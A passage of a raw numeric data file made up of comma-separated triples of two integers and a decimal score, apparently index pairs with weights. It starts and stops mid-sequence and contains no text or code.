,(112,33323,0.93331),(112,33324,0.88669),(112,33325,0.95669),(112,33326,0.91),(120,33326,0.91),(112,33327,1.00331),(112,33328,0.81669),(112,33329,0.93331),(112,33330,0.98),(112,33331,0.98),(112,33332,1.07331),(112,33333,0.84),(112,33334,0.88669),(112,33335,0.81669),(112,33336,0.88669),(112,33337,0.93331),(112,33338,1.07331),(112,33339,0.88669),(112,33340,1.00331),(112,33341,1.77338),(112,33342,0.93331),(112,33343,1.00331),(112,33344,0.81669),(112,33345,0.91),(112,33346,0.37331),(112,33347,1.07331),(112,33348,1.16669),(112,33349,0.46669),(112,33350,1.14331),(112,33351,1.21331),(112,33352,1.12),(112,33353,1.16669),(112,33354,1.4),(112,33355,1.02669),(112,33356,1.12),(112,33357,0.42),(112,33358,1.00331),(112,33359,1.19),(112,33360,0.18669),(112,33361,0.86331),(112,33362,0.95669),(112,33363,0.37331),(112,33364,0.98),(112,33365,1.19),(112,33366,0.23331),(112,33367,0.98),(112,33368,1.09669),(112,33369,0.46669),(112,33370,1.00331),(112,33371,1.23669),(112,33372,1.12),(112,33373,1.19),(112,33374,0.23331),(119,33374,0.23331),(112,33375,0.88669),(119,33375,0.88669),(112,33376,1.05),(112,33377,0.28),(117,33377,0.28),(112,33378,0.95669),(112,33379,1.07331),(112,33380,0.84),(112,33381,0.93331),(112,33382,0.95669),(112,33383,1.12),(112,33384,1.02669),(113,33845,0.18669),(113,33846,0.86331),(113,33847,0.95669),(113,33848,0.91),(113,33849,1.09669),(113,33850,1.14331),(113,33851,1.35331),(113,33852,0.88669),(113,33853,1.14331),(113,33854,1.14331),(113,33855,1.35331),(113,33856,0.37331),(113,33857,0.98),(113,33858,1.16669),(113,33859,0.98),(113,33860,1.05),(113,33861,0.28),(113,33862,0.93331),(113,33863,1.02669),(113,33864,0.37331),(113,33865,1.02669),(113,33866,1.14331),(113,33867,1.05),(113,33868,1.16669),(113,33869,0.91),(113,33870,1.05),(113,34856,0.84),(113,34857,0.93331),(113,34858,0.86331),(113,34859,0.98),(113,34860,0.91),(113,34861,1.02669),(113,34862,0.32669),(113,34863,0.95669),(113,34864,1.02669),(113,34865,0.23331),(113,34866,0.93331),(113,34867,1.12),(113,34868,0.14),(118,34868,0.14),(113,34869,0.95669),(113,34870,1.09669),(113,34871,0.18669),(117,34871,1.12014),(113,34872,0.86331),(113,34873,0.95669),(113,34874,0.28),(113,34875,1.05),(113,34876,1.19),(113,34877,1.00331),(113,34878,0.86331),(117,34878,0.86331),(113,34879,1.02669),(113,34880,0.98),(113,34881,1.14331),(113,34882,1.02669),(113,34883,1.12),(113,34884,0.91),(113,34885,1.05),(113,34886,1.86662),(113,34887,2.19338),(113,34888,0.95669),(113,34889,1.09669),(113,34890,1.02669),(113,34891,0.98),(113,34892,1.16669),(113,34893,0.91),(117,34893,0.91),(113,34894,0.98),(113,34895,1.02669),(113,34896,1.14331),(113,34897,0.93331),(113,34898,1.07331),(113,34899,1.05),(113,34900,1.07331),(113,34901,0.93331),(113,34902,1.12),(113,34903,0.91),(113,34904,1.05),(113,34905,1.96),(113,34906,1.07331),(113,34907,1.05),(113,34908,0.98),(113,34909,1.12),(113,34910,0.88669),(113,34911,0.95669),(113,34912,0.91),(113,34913,1.02669),(113,34914,0.95669),(113,34915,1.21331),(113,34916,0.91),(113,34917,0.98),(113,34918,0.88669),(113,34919,1.14331),(113,34920,0.91),(113,34921,1.05),(113,34922,0.88669),(113,34923,0.98),(113,34924,1.05),(113,34925,1.12),(113,34926,2.73),(113,34927,3.21993),(113,34928,0.93331),(113,34929,1.05),(113,34930,1.05),(113,34931,1.28331),(113,34932,1.09669),(113,34933,1.00331),(113,34934,1.09669),(113,34935,0.91),(113,34936,1.05),(113,34937,1.02669),(113,34938,1.05),(113,34939,0.91),(113,34940,0.98),(113,34941,0.91),(113,34942,1.02669),(113,34943,0.95669),(123,34943,0.95669),(113,34944,1.21331),(113,34945,2.00662),(113,34946,2.28662),(113,34947,1.05),(113,34948,1.19),(113,34949,0.93331),(113,34950,1.05),(113,34951,0.23331),(123,34951,0.23331),(113,34952,0.91),(113,34953,1.00331),(113,34954,1.07331),(113,34955,1.19),(113,34956,0.93331),(113,34957,1.09669),(113,34958,1.05),(113,34959,0.93331),(113,34960,1.05),(113,34961,0.93331),(113,34962,1.16669),(113,34963,1.82),(113,34964,1.07331),(113,34965,1.00331),(113,34966,0.98),(113,34967,1.12),(113,34968,0.98),(113,34969,1.05),(113,34970,0.91),(113,34971,1.05),(113,34972,1.86662),(113,34973,1.16669),(113,34974,1.09669),(113,34975,0.23331),(128,34975,0.23331),(113,34976,0.93331),(113,34977,1.07331),(113,34978,0.93331),(113,34979,1.05),(113,34980,1.14331),(113,34981,1.26),(113,34982,0.93331),(113,34983,1.05),(113,34984,0.95669),(113,34985,1.02669),(113,34986,0.93331),(113,34987,1.02669),(113,34988,0.93331),(113,34989,1.07331),(113,34990,0.86331),(113,34991,0.95669),(113,34992,1.02669),(113,34993,1.21331),(113,34994,1.07331),(113,34995,1.02669),(118,34995,1.02669),(113,34996,1.16669),(113,34997,0.02331),(113,34998,0.91),(113,34999,1.05),(113,35000,0.93331),(113,35001,1.12),(113,35002,0.95669),(113,35003,1.16669),(113,35004,0.93331),(113,35005,1.07331),(113,35006,1.00331),(113,35007,1.09669),(113,35008,0.95669),(113,35009,0.91),(128,35009,0.91),(113,35010,0.98),(113,35011,0.86331),(123,35011,0.86331),(125,35011,0.86331),(113,35012,1.00331),(113,35013,0.91),(113,35014,0.98),(117,35015,0.86331),(113,35015,1.72662),(117,35016,1.00331),(113,35016,2.00662),(113,35017,0.88669),(113,35018,1.05),(113,35019,1.72662),(113,35020,1.12),(113,35021,0.98),(113,35022,0.98),(113,35023,0.98),(113,35024,0.98),(113,35025,1.00331),(113,35026,0.84),(117,35026,0.84),(113,35027,0.93331),(113,35028,0.98),(113,35029,1.02669),(113,35030,1.19),(113,35031,0.88669),(113,35032,0.98),(113,35033,0.23331),(113,35034,0.91),(113,35035,1.16669),(113,35036,0.95669),(113,35037,1.14331),(113,35038,0.88669),(113,35039,1.00331),(113,35040,0.69993),(113,35041,1.82),(113,35042,1.05),(113,35043,1.05),(113,35044,0.88669),(113,35045,1.00331),(113,35046,0.28),(113,35047,0.98),(113,35048,1.09669),(113,35049,0.28),(113,35050,0.91),(113,35051,1.00331),(113,35052,0.65338),(113,35053,0.95669),(113,35054,1.19),(113,35055,1.05),(113,35056,1.14331),(113,35057,0.88669),(113,35058,1.09669),(113,35059,0.42),(113,35060,1.07331),(113,35061,1.21331),(114,35403,0.93331),(114,35404,1.00331),(114,35405,0.81669),(114,35406,1.02669),(114,35408,0.86331),(114,35409,1.00331),(114,35410,0.95669),(114,35411,1.26),(114,35414,0.93331),(114,35415,1.23669),(114,35418,0.91),(114,35419,1.00331),(114,35420,0.86331),(114,35421,1.09669),(114,35422,0.88669),(114,35423,1.07331),(114,35428,1.28331),(114,35429,1.33),(114,35430,0.18669),(114,35431,0.88669),(114,35432,1.19),(114,35433,0.37331),(114,35434,1.02669),(114,35435,1.14331),(114,35436,0.86331),(114,35437,1.00331),(114,35438,1.00331),(114,35439,1.19),(114,35857,0.46669),(114,35858,1.02669),(114,35859,1.16669),(114,35860,0.46662),(114,35861,1.05),(114,35862,1.28331),(114,35863,1.07331),(114,35864,1.30669),(114,35865,0.28),(114,35866,1.02669),(114,35867,1.28331),(114,35868,0.37338),(114,35869,0.86331),(114,35870,1.02669),(114,35871,1.07331),(114,35872,1.14331),(114,35873,0.37331),(114,35874,1.09669),(114,35875,1.37669),(114,35876,0.91),(114,35877,1.12),(114,35878,0.91),(114,35879,1.07331),(114,35880,0.91),(114,35881,1.05),(114,35882,1.00331),(114,35883,1.4),(114,35884,0.37331),(114,35885,1.02669),(114,35886,1.12),(114,35887,0.23331),(114,35888,0.91),(114,35889,0.98),(114,35890,0.37331),(114,35891,0.98),(114,35892,1.23669),(114,35893,0.91),(121,35893,0.91),(114,35894,1.05),(114,35895,1.12),(114,35896,0.86331),(114,35897,1.00331),(114,35898,0.91),(114,35899,0.98),(114,35900,0.88669),(114,35901,1.09669),(118,36751,0.18669),(118,36752,0.86331),(116,36762,1.02669),(128,36782,0.91),(120,36788,0.88669),(125,36788,0.88669),(128,36792,1.77338),(116,36814,0.91),(118,36814,0.91),(117,36822,0.91),(116,36828,0.32669),(123,36828,0.65338),(120,36869,0.84),(116,37231,0.98),(116,37232,1.12),(116,37233,0.14),(116,37234,0.84),(116,37235,0.93331),(116,37503,0.37331),(116,37504,0.98),(116,37505,1.09669),(116,37506,0.91),(116,37507,1.02669),(116,37508,0.88669),(116,37509,0.98),(116,37510,0.98),(116,37511,0.93331),(116,37512,1.12),(116,37513,1.16669),(116,37514,1.05),(116,37515,1.12),(116,37516,0.95669),(116,37517,1.09669),(116,37518,0.86331),(116,37519,0.93331),(116,37520,1.00331),(116,37521,1.07331),(116,37522,0.88669),(116,37523,1.00331),(116,37524,0.86331),(116,37525,0.98),(116,37526,0.91),(116,37527,1.00331),(116,37528,0.93331),(116,37529,1.00331),(116,37530,0.91),(116,37531,1.14331),(116,37532,0.95669),(116,37533,1.21331),(116,37534,0.98),(116,37535,0.91),(116,37536,1.00331),(116,37537,0.98),(116,37538,1.16669),(116,37539,1.14331),(116,37540,0.91),(116,37541,1.07331),(116,37542,0.91),(116,37543,1.00331),(116,37544,0.95669),(116,37545,1.07331),(116,37546,1.05),(116,37547,1.12),(116,37548,0.91),(116,37549,1.00331),(116,37550,0.95669),(116,37551,1.14331),(116,37552,1.16669),(116,37553,1.23669),(116,37554,0.28),(116,37555,1.05),(116,37556,1.12),(116,37557,0.93331),(116,37558,0.95669),(116,37559,1.05),(116,37560,0.93331),(116,37561,1.14331),(116,37562,0.86331),(116,37563,0.95669),(116,37564,0.86331),(125,37564,0.86331),(116,37565,0.95669),(116,37566,1.02669),(116,37567,1.02669),(116,37568,1.02669),(116,37569,1.05),(116,37570,1.23669),(116,37571,1.00331),(116,37572,1.14331),(116,37573,0.95669),(116,37574,1.16669),(116,37575,0.88669),(116,37576,1.05),(116,37577,1.16669),(116,37578,1.30669),(116,37579,0.46669),(116,37580,1.02669),(116,37581,1.14331),(116,37582,0.37331),(116,37583,1.02669),(116,37584,1.21331),(116,37585,0.23331),(116,37586,0.95669),(116,37587,1.02669),(116,37588,1.02669),(116,37589,1.09669),(116,37590,0.93331),(116,37591,1.09669),(117,38060,0.51331),(117,38061,1.26),(117,38062,1.4),(117,38063,1.00331),(117,38064,1.14331),(117,38065,0.42),(117,38066,0.98),(117,38067,1.09669),(117,38068,0.65338),(117,38069,0.95669),(117,38070,1.09669),(117,38071,0.95669),(117,38072,1.05),(117,38073,0.28),(117,38074,0.95669),(117,38075,1.05),(117,38076,1.00331),(117,38077,1.09669),(117,38078,0.93331),(117,38079,1.05),(117,38080,0.51331),(117,38081,1.02669),(117,38082,1.09669),(117,38083,1.07331),(117,38084,1.28331),(117,38085,0.28),(117,38086,1.09669),(117,38087,1.37669),(117,38088,0.91),(117,38089,1.00331),(117,38090,0.37331),(125,38090,0.37331),(117,38091,1.05),(117,38092,1.14331),(117,38093,0.98),(117,38094,1.09669),(117,38095,0.37331),(117,38096,1.05),(117,38097,1.16669),(117,38098,0.32669),(117,38099,0.95669),(117,38100,1.07331),(117,38101,0.65338),(117,38102,0.95669),(117,38103,1.09669),(117,38104,0.98),(117,38105,1.09669),(117,38772,1.00331),(117,38773,1.09669),(117,38774,0.86331),(117,38775,0.98),(117,38776,1.26),(117,38777,1.09669),(117,38778,1.16669),(117,38779,1.02669),(117,38780,1.14331),(117,38781,1.00331),(117,38782,1.12),(117,38783,0.18669),(117,38784,1.00331),(117,38785,1.16669),(117,38786,1.00331),(117,38787,1.09669),(117,38788,0.88669),(117,38789,1.09669),(117,38790,0.88669),(117,38791,0.98),(117,38792,0.95669),(117,38793,1.12),(117,38794,1.82),(117,38795,1.14331),(117,38796,1.02669),(117,38797,1.07331),(117,38798,0.28),(117,38799,0.91),(117,38800,1.00331),(117,38801,0.84),(117,38802,1.00331),(117,38803,0.91),(117,38804,1.16669),(117,38805,1.02669),(117,38806,1.26),(117,38807,0.98),(117,38808,1.07331),(117,38809,0.98),(117,38810,0.98),(117,38811,0.93331),(117,38812,0.93331),(117,38813,1.05),(117,38814,0.95669),(117,38815,1.09669),(117,38816,0.98),(117,38817,1.12),(117,38818,1.82),(117,38819,1.05),(117,38820,1.09669),(117,38821,1.00331),(117,38822,0.98),(117,38823,0.88669),(117,38824,1.09669),(117,38825,0.91),(117,38826,1.07331),(117,38827,1.00331),(117,38828,1.00331),(117,38829,0.95669),(117,38830,1.07331),(117,38831,1.05),(117,38832,0.95669),(117,38833,1.07331),(117,38834,0.91),(117,38835,1.05),(117,38836,0.95669),(117,38837,1.16669),(117,38838,0.98),(117,38839,1.14331),(117,38840,0.88669),(117,38841,1.00331),(117,38842,0.93331),(117,38843,1.21331),(117,38844,0.88669),(117,38845,1.12),(117,38846,0.91),(117,38847,1.00331),(117,38848,0.93331),(117,38849,1.00331),(117,38850,0.86331),(117,38851,0.98),(117,38852,0.88669),(117,38853,1.05),(117,38854,0.93331),(117,38855,1.00331),(117,38856,0.95669),(117,38857,1.07331),(117,38858,3.54676),(117,38859,1.09669),(117,38860,0.98),(117,38861,0.98),(117,38862,1.05),(117,38863,1.00331),(117,38864,0.86331),(118,38864,0.86331),(125,38864,0.86331),(117,38865,1.07331),(117,38866,0.88669),(117,38867,0.98),(117,38868,0.88669),(125,38868,0.88669),(117,38869,1.05),(117,38870,0.42),(117,38871,1.02669),(117,38872,1.19),(117,38873,0.88669),(117,38874,1.02669),(117,38875,1.00331),(117,38876,1.19),(117,38877,2.58993),(117,38878,1.07331),(117,38879,1.91338),(117,38880,1.00331),(117,38881,1.07331),(117,38882,1.05),(117,38883,0.91),(117,38884,1.00331),(117,38885,0.88669),(117,38886,1.05),(117,38887,0.88669),(117,38888,1.16669),(117,38889,0.88669),(117,38890,0.98),(117,38891,0.95669),(117,38892,1.02669),(117,38893,0.93331),(119,38893,0.93331),(117,38894,1.02669),(117,38895,0.93331),(117,38896,1.00331),(117,38897,0.95669),(117,38898,0.95669),(117,38899,0.88669),(117,38900,1.09669),(117,38901,0.91),(117,38902,1.00331),(117,38903,1.05),(117,38904,0.95669),(117,38905,1.07331),(117,38906,0.98),(117,38907,0.28),(117,38908,0.95669),(117,38909,1.14331),(117,38910,0.95669),(117,38911,1.05),(117,38912,0.86331),(117,38913,1.00331),(117,38914,0.98),(117,38915,0.95669),(117,38916,1.00331),(117,38917,1.86662),(117,38918,1.02669),(117,38919,1.05),(117,38920,0.93331),(117,38921,0.88669),(117,38922,1.00331),(117,38923,0.86331),(117,38924,1.02669),(117,38925,1.21331),(117,38926,0.86331),(117,38927,0.93331),(117,38928,0.88669),(117,38929,0.95669),(117,38930,0.88669),(117,38931,0.95669),(117,38932,0.86331),(117,38933,1.07331),(117,38934,1.05),(117,38935,0.95669),(117,38936,0.95669),(117,38937,1.02669),(117,38938,1.00331),(117,38939,1.07331),(117,38940,0.98),(117,38941,1.07331),(117,38942,0.88669),(117,38943,1.05),(117,38944,0.28),(117,38945,1.00331),(117,38946,1.16669),(118,38947,0.23331),(120,38947,0.23331),(117,38947,0.46662),(117,38948,0.95669),(117,38949,1.07331),(117,38950,0.98),(117,38951,1.14331),(117,38952,0.28),(117,38953,0.98),(117,38954,1.12),(117,38955,0.37331),(117,38956,0.95669),(117,38957,1.07331),(117,38958,0.46669),(117,38959,1.02669),(117,38960,1.21331),(117,38961,0.28),(119,38961,0.28),(120,38961,0.28),(125,38961,0.28),(117,38962,0.91),(119,38962,0.91),(120,38962,0.91),(125,38962,0.91),(117,38963,1.02669),(117,38964,0.18669),(117,38965,0.91),(117,38966,0.98),(117,38967,0.91),(117,38968,1.02669),(118,39141,0.84),(118,39142,1.02669),(118,39284,0.51331),(118,39285,1.19),(118,39286,1.28331),(118,39287,0.32669),(118,39288,0.98),(118,39289,1.07331),(118,39290,0.23331),(118,39291,1.02669),(118,39292,1.19),(118,39293,0.98),(118,39294,1.09669),(118,39295,0.14),(118,39296,0.93331),(118,39297,1.02669),(118,39640,1.00331),(118,39641,1.07331),(118,39642,0.46669),(118,39643,1.02669),(118,39644,1.23669),(118,39645,0.28),(118,39646,0.98),(118,39647,1.21331),(118,39648,0.28),(118,39649,0.88669),(118,39650,1.16669),(118,39651,0.91),(118,39652,1.09669),(118,39653,0.93331),(118,39654,0.93331),(118,39655,1.12),(118,39656,1.09669),(118,39657,0.93331),(118,39658,1.00331),(118,39659,1.02669),(118,39660,0.91),(118,39661,0.98),(118,39662,0.95669),(118,39663,0.81669),(118,39664,0.91),(118,39665,1.07331),(118,39666,0.86331),(118,39667,1.02669),(118,39668,1.16669),(118,39669,0.95669),(118,39670,1.09669),(118,39671,0.88669),(134,39671,0.88669),(118,39672,1.05),(118,39673,0.86331),(118,39674,1.00331),(118,39675,0.91),(118,39676,1.09669),(118,39677,0.93331),(118,39678,1.00331),(118,39679,0.88669),(118,39680,1.02669),(118,39681,0.95669),(118,39682,0.91),(118,39683,1.09669),(118,39684,1.05),(118,39685,1.00331),(118,39686,1.12),(118,39687,1.07331),(118,39688,1.14331),(118,39689,1.00331),(118,39690,0.91),(118,39691,0.98),(118,39692,0.18669),(118,39693,0.88669),(118,39694,0.98),(118,39695,1.02669),(118,39696,0.91),(118,39697,1.00331),(118,39698,1.09669),(118,39699,1.14331),(118,39700,0.23331),(118,39701,1.00331),(118,39702,1.09669),(118,39703,0.93331),(118,39704,1.09669),(118,39705,0.91),(118,39706,0.93331),(118,39707,1.00331),(118,39708,0.91),(118,39709,0.86331),(118,39710,1.05),(118,39711,0.88669),(118,39712,1.02669),(118,39713,0.88669),(118,39714,0.88669),(118,39715,0.98),(118,39716,0.88669),(118,39717,1.14331),(118,39718,0.86331),(118,39719,1.00331),(118,39720,0.93331),(118,39721,1.07331),(118,39722,0.28),(118,39723,0.98),(118,39724,1.16669),(119,39823,0.84),(119,39824,0.88669),(119,40194,0.42),(119,40195,1.09669),(119,40196,1.33),(119,40197,0.23331),(119,40198,0.91),(119,40199,0.95669),(119,40200,0.86331),(119,40201,0.91),(119,40202,0.37331),(119,40203,0.95669),(119,40204,1.05),(119,40205,0.98),(119,40206,1.02669),(119,40207,1.00331),(119,40208,1.14331),(119,40209,0.56),(119,40210,0.88669),(119,40211,0.98),(119,40212,0.93331),(119,40213,1.02669),(119,40214,0.46669),(119,40215,1.02669),(119,40216,1.09669),(119,40217,0.28),(119,40218,0.91),(119,40219,1.00331),(119,40220,0.56),(119,40221,1.09669),(119,40222,1.23669),(119,40223,1.09669),(119,40224,1.28331),(119,40814,0.65338),(119,40815,0.93331),(119,40816,1.07331),(119,40817,0.95669),(119,40818,1.05),(119,40819,0.28),(119,40820,0.91),(119,40821,1.00331),(119,40822,0.18669),(119,40823,0.91),(119,40824,1.02669),(119,40825,0.88669),(119,40826,0.93331),(119,40827,2.00662),(119,40828,1.09669),(119,40829,1.12),(119,40830,1.00331),(119,40831,0.86331),(119,40832,0.95669),(119,40833,0.95669),(119,40834,1.05),(119,40835,2.73),(119,40836,0.98),(119,40837,1.14331),(119,40838,1.00331),(119,40839,0.93331),(119,40840,1.02669),(119,40841,0.91),(119,40842,1.14331),(125,40843,0.88669),(119,40843,1.77338),(119,40844,0.98),(119,40845,1.07331),(119,40846,0.98),(119,40847,1.19),(119,40848,0.88669),(119,40849,1.00331),(119,40850,0.88669),(119,40851,0.98),(119,40852,0.93331),(119,40853,1.02669),(119,40854,0.91),(119,40855,1.12),(119,40856,0.93331),(119,40857,0.91),(119,40858,1.05),(119,40859,0.98),(119,40860,1.07331),(119,40861,0.95669),(119,40862,1.09669),(119,40863,1.02669),(119,40864,1.02669),(119,40865,1.12),(119,40866,1.91338),(119,40867,1.14331),(119,40868,1.16669),(119,40869,0.88669),(119,40870,0.98),(119,40871,0.88669),(119,40872,0.93331),(119,40873,0.91),(119,40874,1.09669),(119,40875,0.91),(119,40876,0.98),(119,40877,0.23331),(119,40878,0.91),(119,40879,1.21331),(119,40880,0.95669),(119,40881,1.05),(119,40882,1.07331),(119,40883,1.14331),(119,40884,0.86331),(119,40885,0.95669),(119,40886,0.69993),(119,40887,0.88669),(119,40888,0.98),(119,40889,0.88669),(119,40890,1.07331),(119,40891,0.95669),(119,40892,1.02669),(119,40893,1.00331),(119,40894,1.26),(119,40895,0.88669),(119,40896,1.00331),(119,40897,0.93331),(119,40898,1.02669),(119,40899,0.91),(119,40900,1.05),(119,40901,1.12),(119,40902,1.00331),(119,40903,1.12),(119,40904,0.91),(119,40905,1.00331),(119,40906,1.00331),(119,40907,1.12),(119,40908,0.93331),(119,40909,1.09669),(119,40910,0.91),(119,40911,0.98),(119,40912,0.91),(119,40913,1.00331),(119,40914,0.86331),(119,40915,1.00331),(119,40916,0.84),(119,40917,1.09669),(119,40918,0.93331),(119,40919,0.98),(119,40920,0.95669),(119,40921,1.05),(119,40922,0.93331),(119,40923,1.12),(119,40924,0.84),(119,40925,0.93331),(119,40926,0.88669),(125,40926,0.88669),(119,40927,1.00331),(119,40928,0.86331),(119,40929,0.98),(119,40930,0.95669),(119,40931,1.05),(119,40932,0.95669),(119,40933,0.98),(119,40934,0.88669),(119,40935,0.98),(119,40936,0.86331),(119,40937,0.95669),(119,40938,0.88669),(119,40939,1.00331),(119,40940,0.86331),(119,40941,1.05),(119,40942,0.88669),(119,40943,1.02669),(119,40944,0.28),(119,40945,0.93331),(119,40946,1.05),(119,40947,0.28),(119,40948,0.98),(119,40949,1.12),(119,40950,1.09669),(119,40951,1.07331),(119,40952,0.84),(119,40953,0.93331),(119,40954,0.91),(119,40955,1.07331),(119,40956,0.80004),(120,41112,0.14),(120,41113,0.88669),(120,41114,1.02669),(120,41121,0.14),(120,41122,0.86331),(120,41123,0.95669),(125,41652,0.23331),(120,41652,0.46662),(120,41653,0.95669),(120,41654,1.09669),(120,41655,0.98),(120,41656,1.05),(120,41657,0.65338),(120,41658,2.1),(120,41659,1.21331),(120,41660,1.26),(120,41661,0.95669),(120,41662,0.42),(120,41663,0.98),(120,41664,1.14331),(120,41665,1.16669),(120,41666,1.35331),(120,41667,1.02669),(120,41668,0.98),(120,41669,1.02669),(120,41670,0.37331),(120,41671,1.00331),(120,41672,1.07331),(120,41673,0.28),(120,41674,1.05),(120,41675,1.16669),(120,41676,0.37331),(120,41677,1.00331),(120,41678,1.23669),(120,41679,0.60669),(120,41680,1.12),(120,41681,1.21331),(120,41682,0.23331),(120,41683,1.05),(120,41684,1.12),(120,41685,0.18669),(120,41686,0.91),(120,41687,0.98),(120,41688,1.14331),(120,41689,1.23669),(120,41690,0.95669),(120,41691,1.07331),(120,41692,0.86331),(120,41693,0.93331),(120,41694,0.91),(120,41695,1.02669),(120,41696,0.93331),(120,41697,1.02669),(120,41698,0.93331),(120,41699,1.02669),(120,41700,1.00331),(120,41701,1.12),(120,41702,1.00331),(120,41703,1.21331),(120,41704,0.37331),(120,41705,1.05),(120,41706,1.14331),(120,42632,0.32669),(120,42633,0.98),(120,42634,1.07331),(120,42635,0.95669),(120,42636,1.02669),(120,42637,0.74662),(120,42638,1.07331),(120,42639,1.19),(120,42640,0.98),(120,42641,1.09669),(120,42642,1.12),(120,42643,1.19),(120,42644,0.56),(120,42645,1.07331),(120,42646,1.21331),(120,42647,0.86331),(120,42648,1.05),(120,42649,0.84),(120,42650,0.91),(120,42651,0.88669),(128,42651,0.88669),(120,42652,1.02669),(128,42652,1.02669),(120,42653,0.86331),(120,42654,1.07331),(120,42655,0.95669),(120,42656,1.09669),(120,42657,1.02669),(120,42658,1.16669),(120,42659,0.98),(120,42660,1.16669),(120,42661,1.07331),(120,42662,1.26),(120,42663,0.86331),(120,42664,1.02669),(120,42665,0.88669),(120,42666,0.95669),(120,42667,0.95669),(120,42668,1.00331),(120,42669,1.02669),(120,42670,1.14331),(120,42671,0.98),(120,42672,1.09669),(120,42673,0.84),(120,42674,0.95669),(120,42675,0.84),(120,42676,1.02669),(120,42677,1.12),(120,42678,1.07331),(120,42679,0.98),(120,42680,1.05),(120,42681,0.86331),(120,42682,0.93331),(120,42683,0.95669),(120,42684,1.16669),(120,42685,1.82),(120,42686,1.05),(120,42687,1.07331),(120,42688,1.00331),(120,42689,1.07331),(120,42690,1.02669),(120,42691,1.02669),(120,42692,0.98),(120,42693,1.19),(120,42694,0.93331),(120,42695,1.12),(120,42696,0.88669),(120,42697,0.95669),(120,42698,1.02669),(120,42699,1.12),(120,42700,1.09669),(120,42701,1.86662),(120,42702,1.00331),(120,42703,1.05),(120,42704,0.88669),(120,42705,0.98),(120,42706,1.00331),(120,42707,1.07331),(120,42708,0.88669),(120,42709,1.02669),(120,42710,0.95669),(120,42711,1.14331),(120,42712,0.98),(120,42713,1.05),(120,42714,1.02669),(120,42715,1.16669),(120,42716,0.93331),(120,42717,1.12),(120,42718,0.93331),(120,42719,1.07331),(120,42720,0.98),(120,42721,1.05),(120,42722,0.98),(120,42723,1.16669),(120,42724,1.23669),(120,42725,1.19),(120,42726,0.98),(120,42727,0.95669),(120,42728,1.09669),(120,42729,1.02669),(120,42730,1.12),(120,42731,0.91),(120,42732,1.07331),(120,42733,0.93331),(120,42734,1.00331),(120,42735,0.91),(120,42736,1.02669),(120,42737,1.00331),(120,42738,1.00331),(120,42739,1.09669),(120,42740,0.86331),(120,42741,1.05),(120,42742,1.02669),(120,42743,0.86331),(120,42744,1.05),(120,42745,0.95669),(120,42746,1.07331),(120,42747,0.42),(120,42748,0.98),(120,42749,1.09669),(120,42750,1.05),(120,42751,1.16669),(120,42752,0.91),(120,42753,1.02669),(120,42754,0.98),(120,42755,1.12),(120,42756,0.93331),(120,42757,1.05),(120,42758,0.98),(120,42759,1.12),(120,42760,0.88669),(120,42761,1.05),(120,42762,0.98),(120,42763,1.05),(120,42764,0.91),(120,42765,1.02669),(120,42766,0.91),(120,42767,1.00331),(120,42768,0.37331),(120,42769,0.95669),(120,42770,1.12),(120,42771,0.23331),(120,42772,0.95669),(120,42773,1.19),(120,42774,0.86331),(120,42775,1.09669),(120,42776,0.93331),(120,42777,1.02669),(120,42778,0.95669),(120,42779,1.09669),(120,42780,0.91),(120,42781,1.07331),(120,42782,1.02669),(120,42783,0.81669),(120,42784,1.07331),(120,42785,0.88669),(120,42786,0.98),(120,42787,0.95669),(120,42788,1.02669),(120,42789,0.98),(120,42790,1.07331),(120,42791,0.95669),(120,42792,1.05),(120,42793,1.68),(120,42794,0.95669),(120,42795,1.09669),(120,42796,0.93331),(120,42797,0.91),(120,42798,1.12),(120,42799,0.86331),(120,42800,0.98),(120,42801,0.88669),(120,42802,0.95669),(120,42803,0.91),(120,42804,1.00331),(120,42805,0.84),(120,42806,0.95669),(120,42807,0.88669),(120,42808,0.95669),(120,42809,0.93331),(120,42810,1.07331),(120,42811,0.86331),(120,42812,0.95669),(120,42813,0.91),(120,42814,1.00331),(120,42815,0.84),(120,42816,0.98),(120,42817,1.21331),(120,42818,1.05),(120,42819,1.07331),(120,42820,0.84),(120,42821,1.05),(120,42822,0.86331),(120,42823,0.95669),(120,42824,0.88669),(120,42825,0.91),(120,42826,1.00331),(120,42827,0.95669),(120,42828,0.84),(120,42829,1.02669),(120,42830,1.09669),(120,42831,0.93331),(120,42832,0.93331),(120,42833,0.86331),(120,42834,0.93331),(120,42835,0.84),(126,42835,0.84),(120,42836,0.93331),(126,42836,0.93331),(120,42837,0.86331),(120,42838,1.12),(120,42839,1.02669),(120,42840,1.16669),(120,42841,0.42),(120,42842,1.00331),(120,42843,1.09669),(120,42844,0.95669),(120,42845,1.09669),(120,42846,0.88669),(120,42847,0.98),(120,42848,0.32669),(120,42849,1.05),(120,42850,1.12),(120,42851,1.07331),(120,42852,1.16669),(120,42853,1.00331),(120,42854,0.91),(120,42855,1.09669),(120,42856,0.88669),(120,42857,1.07331),(121,43171,1.00331),(121,43172,1.05),(121,43175,0.79331),(121,43176,0.93331),(121,43177,1.02669),(121,43178,1.09669),(121,43179,0.88669),(121,43180,1.4),(121,43181,0.18662),(121,43182,1.00331),(121,43183,1.09669),(121,43184,0.98),(121,43185,1.09669),(121,43186,0.37331),(121,43187,0.95669),(121,43188,1.09669),(121,43189,0.37331),(121,43190,1.00331),(121,43191,1.14331),(121,43192,0.37331),(121,43193,0.95669),(121,43194,1.09669),(121,43426,0.7),(121,43427,1.4),(121,43428,1.4),(121,43429,0.93331),(121,43430,1.12),(121,43431,0.88669),(121,43432,1.19),(121,43433,1.00331),(121,43434,1.23669),(121,43435,1.05),(121,43436,1.02669),(121,43437,1.16669),(121,43438,1.00331),(121,43439,1.28331),(121,43440,0.18669),(121,43441,0.86331),(121,43442,1.02669),(121,43443,6.29),(121,43444,0.23331),(121,43445,0.95669),(121,43446,1.16669),(121,43447,1.07331),(123,44756,0.81669),(123,44757,0.95669),(123,44758,0.56),(123,44759,1.07331),(123,44760,1.14331),(123,44761,0.42),(123,44762,1.00331),(123,44763,1.12),(123,44764,0.28),(123,44765,1.02669),(123,44766,1.23669),(123,44767,2.24),(123,44768,2.38),(123,44769,0.88669),(123,44770,1.09669),(123,44771,0.88669),(123,44772,0.93331),(123,44773,0.42),(123,44774,1.07331),(123,44775,1.14331),(123,45259,0.32669),(123,45260,1.12),(123,45261,1.30669),(123,45262,0.93331),(123,45263,1.05),(123,45264,0.32669),(123,45265,0.93331),(123,45266,1.02669),(123,45267,0.74662),(123,45268,1.02669),(123,45269,1.12),(123,45270,1.00331),(123,45271,1.09669),(123,45272,1.00331),(123,45273,1.16669),(123,45274,1.02669),(123,45275,1.86662),(123,45276,1.16669),(123,45277,1.05),(123,45278,1.16669),(12